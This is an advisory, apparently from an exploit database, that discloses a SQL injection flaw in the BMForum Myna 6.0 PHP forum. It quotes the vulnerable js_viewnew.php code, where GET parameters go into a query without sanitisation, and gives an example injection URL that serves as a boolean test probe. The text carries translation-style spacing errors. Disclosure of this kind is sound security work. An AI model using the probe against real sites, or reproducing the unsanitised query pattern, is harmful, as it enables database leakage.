BMForum is a new PHP Forum program based on MySQL databases for personal and commercial applications. BMForum Myna 6.0 has the SQL injection vulnerability, which may cause leakage of sensitive information.
[+] Info:
~~~~~~~~~
BMForum Myna 6.0 SQL Injection Vulnerability
# Author: Stephen Sattler
# Software Website: http://www.bmforum.com/
# Software Link: http://www.bmforum.com/down/
# Required: magic quotes = Off
[+] Poc:
~~~~~~~~~
/Add-on/js_viewnew.php line 20 ++:
$ Length = $ _ GET [length];
$ Forumid = $ _ GET [forumid];
$ Num = $ _ GET [num];
$ Forumnum = $ forumid;
{....}
$ Query = "SELECT * FROM {$ database_up} threads WHERE forumid = $ forumid order by changetime desc limit 0, $ num ";
# Explanation:
$ Forumid ($ _ GET [forumid]) isnt sanitized at all, an attacker cocould use this for an SQL-Injection.
# Example for an injection:
Http: // [site]/[folder]/js_viewnew.php? Forumid = 2 + AnD + 1 = 1 & num = 1 & length = 1
[+] Reference:
~~~~~~~~~
Http://www.exploit-db.com/exploits/16938